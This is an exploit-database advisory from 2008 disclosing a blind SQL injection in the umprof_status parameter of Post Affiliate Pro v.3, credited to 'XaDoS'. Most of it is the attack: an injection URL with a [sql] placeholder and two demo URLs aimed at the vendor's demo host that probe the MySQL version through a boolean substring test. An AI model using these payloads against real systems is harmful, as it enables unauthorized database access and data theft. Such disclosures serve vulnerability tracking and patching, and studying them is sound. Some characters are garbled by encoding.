[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Post Affiliate Pro v.3 (umprof_status) Blind SQL Injection Vulnerability
# Published : 2008-11-26
# Author : XaDoS
# Previous Title : CMS Ortus <= 1.13 Remote SQL Injection Vulnerability
# Next Title : ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability
[a–?] Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection
>??<
> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> B?§g: Blind $ql inJection
> SIte vuln: http://www.qualityunit.com/postaffiliatepro/
>??<
[a–?] ExPL0iT:
|: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql]
[you must be merchants]
[a–?] D?£M0:
|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO?°?°]
|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)]
[a–?] Th4nKs::
> Str0ke </
> Joy Division </
> Teo Babbeo </
> Spud </
> Loooo Z00ooo00oo0 </ Lol ;-)
# www.Syue.com [2008-11-26]